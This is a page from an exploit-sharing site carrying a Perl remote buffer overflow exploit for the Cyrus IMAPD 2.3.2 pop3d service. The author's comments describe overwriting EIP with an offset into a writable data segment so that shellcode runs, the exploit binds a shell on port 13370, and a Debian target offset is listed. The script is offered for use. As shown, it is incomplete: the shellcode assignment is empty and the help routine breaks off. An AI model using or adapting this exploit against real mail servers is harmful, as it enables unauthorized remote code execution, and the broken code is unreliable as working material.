[ authorization ] [ registration ] [ Ripristina ]
Ci puoi contattare tramite:
0day.today Exploits Market and 0day Exploits Database

Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)

Security Risk Unsored
remote exploits
Data inserimento
Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)

## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
##  exploits and not either of them worked (not that they don't but coding my own is generaly faster
##  and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
##  unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
##  realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
##  when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
##  the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
##  done here is used the same method, yet found a data area that is not going to freak pop3d
##  out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
##  'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. 
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
##  is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
##  that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
##  shellcode (because it'll segfault and won't get executed).
## Note: bindport is 13370
use IO::Socket;
use strict;

my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
# metasploit sc to work (as usualy, hmph)
my $shellcode = 

my $sock = IO::Socket::INET->new('PeerAddr' => $host,
                                 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");


print $sock "USER ";                       ## begin USER command with just that
print $sock "$shellcode";                  ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n";                          ## that simple

sub help {
	print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
	print "08/12/2006\n\n";
	print "perl $0 \$host \$offset\n\n";
	print "Offsets: \n";
	print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";


#  0day.today [2024-07-16]  #